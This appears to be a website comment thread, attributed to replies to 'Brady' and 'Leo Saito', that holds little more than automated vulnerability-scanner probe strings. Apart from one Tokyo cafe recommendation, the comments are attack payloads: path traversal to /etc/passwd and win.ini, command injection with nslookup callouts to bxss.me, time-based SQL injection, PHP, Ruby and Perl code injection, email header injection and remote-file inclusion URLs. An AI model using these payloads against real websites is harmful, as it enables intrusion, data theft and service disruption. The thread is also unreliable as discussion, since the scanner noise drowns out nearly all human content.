%2fetc%2fpasswd
re: Brady
&echo zmwtyz$()\ ynadui\nz^xyu||a #' &echo zmwtyz$()\ ynadui\nz^xyu||a #|" &echo zmwtyz$()\ ynadui\nz^xyu||a #
re: Brady
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Brady
|echo pqakjd$()\ julsmk\nz^xyu||a #' |echo pqakjd$()\ julsmk\nz^xyu||a #|" |echo pqakjd$()\ julsmk\nz^xyu||a #
re: Brady
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Brady
(nslookup hitskupwfknqn3a98e.bxss.me||perl -e "gethostbyname('hitskupwfknqn3a98e.bxss.me')")
re: Brady
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Brady
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Brady
$(nslookup hitkyjjtxfbvq87445.bxss.me||perl -e "gethostbyname('hitkyjjtxfbvq87445.bxss.me')")
re: Brady
HttP://bxss.me/t/xss.html?%00
re: Brady
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Brady
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Brady
&nslookup hitxjezsaubty0a9fa.bxss.me&'\"`0&nslookup hitxjezsaubty0a9fa.bxss.me&`'
re: Brady
"+"A".concat(70-3).concat(22*4).concat(117).concat(85).concat(114).concat(75)+(require"socket"
Socket.gethostbyname("hitxk"+"wgpzjfzc07b44.bxss.me.")[3].to_s)+"
re: Brady
bxss.me/t/xss.html?%00
re: Brady
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Brady
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Brady
&(nslookup hitocjjxrzafsbd6f1.bxss.me||perl -e "gethostbyname('hitocjjxrzafsbd6f1.bxss.me')")&'\"`0&(nslookup hitocjjxrzafsbd6f1.bxss.me||perl -e "gethostbyname('hitocjjxrzafsbd6f1.bxss.me')")&`'
re: Brady
'+'A'.concat(70-3).concat(22*4).concat(116).concat(71).concat(106).concat(86)+(require'socket'
Socket.gethostbyname('hitdf'+'kqlyklhz2828c.bxss.me.')[3].to_s)+'
re: Brady
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Brady
Http://bxss.me/t/fit.txt
re: Brady
|(nslookup hitvfajrqnrbs054d0.bxss.me||perl -e "gethostbyname('hitvfajrqnrbs054d0.bxss.me')")
re: Brady
file:///etc/passwd
re: Brady
`(nslookup hitlaknuauwsa86f04.bxss.me||perl -e "gethostbyname('hitlaknuauwsa86f04.bxss.me')")`
re: Brady
http://bxss.me/t/fit.txt%3F.jpg
re: Brady
'"
re: Brady
/\../\../\../\../\../\../\../etc/passwd
re: Brady
;(nslookup hitsvztqxdyxo00cec.bxss.me||perl -e "gethostbyname('hitsvztqxdyxo00cec.bxss.me')")|(nslookup hitsvztqxdyxo00cec.bxss.me||perl -e "gethostbyname('hitsvztqxdyxo00cec.bxss.me')")&(nslookup hitsvztqxdyxo00cec.bxss.me||perl -e "gethostbyname('hitsvztqxdyxo00cec.bxss.me')")
re: Brady
/etc/shells
re: Brady
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Brady
<!--
re: Brady
/WEB-INF/web.xml
re: Brady
c:/windows/win.ini
re: Brady
';print(md5(31337));$a='
re: Brady
C:\WINDOWS\system32\drivers\etc\hosts
re: Brady
bxss.me
re: Brady
";print(md5(31337));$a="
re: Brady
../../../../../../../../../../windows/win.ini%00.jpg
re: Brady
${@print(md5(31337))}
re: Brady
/../../../../../../../../../../boot.ini
re: Brady
${@print(md5(31337))}\
re: Brady
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Brady
'.print(md5(31337)).'
re: Brady
..\..\..\..\..\..\..\..\windows\win.ini
re: Brady
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Brady
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Brady
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Brady
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Brady
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Brady
WEB-INF/web.xml
re: Brady
WEB-INF\web.xml
re: Brady
1
re: Brady
1
re: Brady
-1 OR 2+465-465-1=0+0+0+1 --
re: Brady
-1 OR 3+465-465-1=0+0+0+1 --
re: Brady
-1 OR 2+371-371-1=0+0+0+1
re: Brady
-1 OR 3+371-371-1=0+0+0+1
re: Brady
-1' OR 2+687-687-1=0+0+0+1 --
re: Brady
-1' OR 3+687-687-1=0+0+0+1 --
re: Brady
-1' OR 2+979-979-1=0+0+0+1 or 'zb4XifSc'='
re: Brady
-1' OR 3+979-979-1=0+0+0+1 or 'zb4XifSc'='
re: Brady
-1" OR 2+598-598-1=0+0+0+1 --
re: Brady
-1" OR 3+598-598-1=0+0+0+1 --
re: Brady
if(now()=sysdate(),sleep(15),0)
re: Brady
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Brady
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Brady
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Brady
-1; waitfor delay '0:0:15' --
re: Brady
-1); waitfor delay '0:0:15' --
re: Brady
1 waitfor delay '0:0:15' --
re: Brady
LLADVsuH'; waitfor delay '0:0:15' --
re: Brady
-5 OR 478=(SELECT 478 FROM PG_SLEEP(15))--
re: Brady
-5) OR 475=(SELECT 475 FROM PG_SLEEP(15))--
re: Brady
-1)) OR 777=(SELECT 777 FROM PG_SLEEP(15))--
re: Brady
P5F0Hdiw' OR 297=(SELECT 297 FROM PG_SLEEP(15))--
re: Brady
RvKvVkI6') OR 149=(SELECT 149 FROM PG_SLEEP(15))--
re: Brady
IfCwh995')) OR 162=(SELECT 162 FROM PG_SLEEP(15))--
re: Brady
1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Brady
1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Brady
'||(select 1 from (select pg_sleep(15))x)||'
re: Brady
''||(select 1 from (select pg_sleep(15))x)||''
re: Brady
1'"
re: Brady
@@qC5te
My favourite in Tokyo.
Chatei Hatou(茶亭 羽當 渋谷店)
https://tabelog.com/tokyo/A1303/A130301/13001169/
re: Leo Saito
ZhjLroKm
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+291-291-1=0+0+0+1
re: Leo Saito
9rdgUWJB
re: Leo Saito
-1 OR 3+291-291-1=0+0+0+1
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
1*
re: Leo Saito
-1 OR 2+35-35-1=0+0+0+1
re: Leo Saito
-1 OR 3+35-35-1=0+0+0+1
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
if(now()=sysdate(),sleep(15),0)
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1; waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
-1); waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
1 waitfor delay '0:0:15' --
re: Leo Saito
ggEZXh8p'; waitfor delay '0:0:15' --
re: Leo Saito
7HUcc5SL'; waitfor delay '0:0:15' --
re: Leo Saito
-5 OR 849=(SELECT 849 FROM PG_SLEEP(15))--
re: Leo Saito
-5 OR 382=(SELECT 382 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 825=(SELECT 825 FROM PG_SLEEP(15))--
re: Leo Saito
-5) OR 533=(SELECT 533 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 195=(SELECT 195 FROM PG_SLEEP(15))--
re: Leo Saito
-1)) OR 694=(SELECT 694 FROM PG_SLEEP(15))--
re: Leo Saito
VQKYEmNS' OR 241=(SELECT 241 FROM PG_SLEEP(15))--
re: Leo Saito
zlVD4LMp' OR 797=(SELECT 797 FROM PG_SLEEP(15))--
re: Leo Saito
DMwBJWb2') OR 102=(SELECT 102 FROM PG_SLEEP(15))--
re: Leo Saito
nKf27twh') OR 570=(SELECT 570 FROM PG_SLEEP(15))--
re: Leo Saito
vHRYTkgW')) OR 847=(SELECT 847 FROM PG_SLEEP(15))--
re: Leo Saito
GcgpC4Fb')) OR 146=(SELECT 146 FROM PG_SLEEP(15))--
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
'||(select 1 from (select pg_sleep(15))x)||'
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@z1P2f
re: Leo Saito
''||(select 1 from (select pg_sleep(15))x)||''
re: Leo Saito
1'"
re: Leo Saito
@@jPmP9
re: Leo Saito
1FBVRMSzO
re: Leo Saito
%0abcc:074625.67-13441.67.8852f.19990.2@bxss.me
re: Leo Saito
to@example.com>%0d%0abcc:074625.67-13442.67.8852f.19990.2@bxss.me
re: Leo Saito
response.write(9623498*9346451)
re: Leo Saito
'+response.write(9623498*9346451)+'
re: Leo Saito
<esi:include src="http://bxss.me/rpb.png"/>
re: Leo Saito
"+response.write(9623498*9346451)+"
re: Leo Saito
${9999023+10000330}
re: Leo Saito
../../../../../../../../../../../../../../etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../windows/win.ini
re: Leo Saito
file:///etc/passwd
re: Leo Saito
../../../../../../../../../../../../../../../proc/version
re: Leo Saito
'.gethostbyname(lc('hitzj'.'rudfhdde18761.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(102).chr(73).chr(120).chr(69).'
re: Leo Saito
)
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: Leo Saito
".gethostbyname(lc("hitqf"."zmtbfpds7ef16.bxss.me."))."A".chr(67).chr(hex("58")).chr(101).chr(75).chr(122).chr(83)."
re: Leo Saito
!(()&&!|*|*|
re: Leo Saito
../../../../../../../../../../etc/passwd%00.jpg
re: Leo Saito
^(#$!@#$)(()))******
re: Leo Saito
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: Leo Saito
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: Leo Saito
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: Leo Saito
/etc/passwd
re: Leo Saito
echo fcpgjx$()\ meeiob\nz^xyu||a #' &echo fcpgjx$()\ meeiob\nz^xyu||a #|" &echo fcpgjx$()\ meeiob\nz^xyu||a #
re: Leo Saito
%2fetc%2fpasswd
re: Leo Saito
HttP://bxss.me/t/xss.html?%00
re: Leo Saito
&echo cbbdma$()\ jkdzjk\nz^xyu||a #' &echo cbbdma$()\ jkdzjk\nz^xyu||a #|" &echo cbbdma$()\ jkdzjk\nz^xyu||a #
re: Leo Saito
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Leo Saito
/.././.././.././.././.././.././.././../etc/./passwd%00
re: Leo Saito
"+"A".concat(70-3).concat(22*4).concat(105).concat(67).concat(111).concat(66)+(require"socket"
Socket.gethostbyname("hitaw"+"bxthxhnq27188.bxss.me.")[3].to_s)+"
re: Leo Saito
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Leo Saito
bxss.me/t/xss.html?%00
re: Leo Saito
|echo wunapu$()\ ngnvhp\nz^xyu||a #' |echo wunapu$()\ ngnvhp\nz^xyu||a #|" |echo wunapu$()\ ngnvhp\nz^xyu||a #
re: Leo Saito
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: Leo Saito
'+'A'.concat(70-3).concat(22*4).concat(122).concat(78).concat(107).concat(73)+(require'socket'
Socket.gethostbyname('hitlu'+'qckhwnmp5aa00.bxss.me.')[3].to_s)+'
re: Leo Saito
';print(md5(31337));$a='
re: Leo Saito
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Leo Saito
(nslookup hitowastrsjqn1f727.bxss.me||perl -e "gethostbyname('hitowastrsjqn1f727.bxss.me')")
re: Leo Saito
Http://bxss.me/t/fit.txt
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: Leo Saito
";print(md5(31337));$a="
re: Leo Saito
$(nslookup hiteeyldufampa98b0.bxss.me||perl -e "gethostbyname('hiteeyldufampa98b0.bxss.me')")
re: Leo Saito
http://bxss.me/t/fit.txt%3F.jpg
re: Leo Saito
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: Leo Saito
${@print(md5(31337))}
re: Leo Saito
&nslookup hitqtjanpimowc5a04.bxss.me&'\"`0&nslookup hitqtjanpimowc5a04.bxss.me&`'
re: Leo Saito
/etc/shells
re: Leo Saito
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: Leo Saito
${@print(md5(31337))}\
re: Leo Saito
&(nslookup hitbrlcdwsrgk826f0.bxss.me||perl -e "gethostbyname('hitbrlcdwsrgk826f0.bxss.me')")&'\"`0&(nslookup hitbrlcdwsrgk826f0.bxss.me||perl -e "gethostbyname('hitbrlcdwsrgk826f0.bxss.me')")&`'
re: Leo Saito
c:/windows/win.ini
re: Leo Saito
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: Leo Saito
'.print(md5(31337)).'
re: Leo Saito
'"
re: Leo Saito
|(nslookup hitishiavxdaz7cf0c.bxss.me||perl -e "gethostbyname('hitishiavxdaz7cf0c.bxss.me')")
re: Leo Saito
bxss.me
re: Leo Saito
file:///etc/passwd
re: Leo Saito
<!--
re: Leo Saito
`(nslookup hityyietmbcpif9c13.bxss.me||perl -e "gethostbyname('hityyietmbcpif9c13.bxss.me')")`
re: Leo Saito
/\../\../\../\../\../\../\../etc/passwd
re: Leo Saito
;(nslookup hitwfdbofzoiebffec.bxss.me||perl -e "gethostbyname('hitwfdbofzoiebffec.bxss.me')")|(nslookup hitwfdbofzoiebffec.bxss.me||perl -e "gethostbyname('hitwfdbofzoiebffec.bxss.me')")&(nslookup hitwfdbofzoiebffec.bxss.me||perl -e "gethostbyname('hitwfdbofzoiebffec.bxss.me')")
re: Leo Saito
/WEB-INF/web.xml
re: Leo Saito
C:\WINDOWS\system32\drivers\etc\hosts
re: Leo Saito
../../../../../../../../../../windows/win.ini%00.jpg
re: Leo Saito
/../../../../../../../../../../boot.ini
re: Leo Saito
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: Leo Saito
..\..\..\..\..\..\..\..\windows\win.ini
re: Leo Saito
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: Leo Saito
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: Leo Saito
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: Leo Saito
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: Leo Saito
